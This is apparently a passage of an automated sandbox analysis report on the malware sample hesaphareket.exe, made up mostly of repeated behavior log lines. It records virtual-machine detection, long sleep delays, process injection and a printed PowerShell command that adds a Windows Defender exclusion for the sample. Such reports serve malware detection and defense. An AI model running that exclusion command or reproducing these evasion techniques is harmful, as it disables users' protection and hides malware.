                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: hesaphareket.exe PID: 6188, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\hesaphareket.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory allocated: B30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory allocated: 25D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory allocated: 45D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory allocated: 75E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory allocated: 85E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory allocated: 87A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory allocated: 97A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199875Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199766Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199641Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199516Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199406Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199297Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199188Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199063Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198952Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198828Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198719Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198609Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198498Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198390Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198281Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198147Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198004Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197844Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197734Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197610Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197485Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197375Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197235Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197125Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197016Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196906Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196797Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196688Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196578Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196465Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196359Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196250Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196141Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196016Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195906Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195797Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195687Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195578Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195465Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195360Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195249Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195141Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195016Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194891Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194781Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194672Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194562Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194449Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194344Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194234Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6155Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2824Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeWindow / User API: threadDelayed 1761Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeWindow / User API: threadDelayed 8084Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 5472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep count: 39 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1200000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7576Thread sleep count: 1761 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1199875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7576Thread sleep count: 8084 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1199766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1199641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1199516s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1199406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1199297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1199188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1199063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1198952s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1198828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1198719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1198609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1198498s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1198390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1198281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1198147s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1198004s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1197844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1197734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1197610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1197485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1197375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1197235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1197125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1197016s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1196906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1196797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1196688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1196578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1196465s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1196359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1196250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1196141s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1196016s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1195906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1195797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1195687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1195578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1195465s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1195360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1195249s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1195141s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1195016s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1194891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1194781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1194672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1194562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1194449s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1194344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exe TID: 7572Thread sleep time: -1194234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\hesaphareket.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\hesaphareket.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199875Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199766Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199641Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199516Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199406Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199297Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199188Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1199063Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198952Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198828Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198719Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198609Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198498Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198390Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198281Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198147Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1198004Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197844Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197734Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197610Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197485Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197375Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197235Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197125Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1197016Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196906Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196797Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196688Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196578Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196465Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196359Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196250Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196141Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1196016Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195906Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195797Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195687Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195578Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195465Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195360Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195249Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195141Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1195016Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194891Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194781Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194672Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194562Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194449Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194344Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeThread delayed: delay time: 1194234Jump to behavior
                    Source: hesaphareket.exe, 00000000.00000002.1330138816.0000000000824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: hesaphareket.exe, 00000000.00000002.1330138816.0000000000824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\"
                    Source: hesaphareket.exe, 00000007.00000002.3771616968.00000000010D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\hesaphareket.exeMemory written: C:\Users\user\Desktop\hesaphareket.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeProcess created: C:\Users\user\Desktop\hesaphareket.exe "C:\Users\user\Desktop\hesaphareket.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Users\user\Desktop\hesaphareket.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
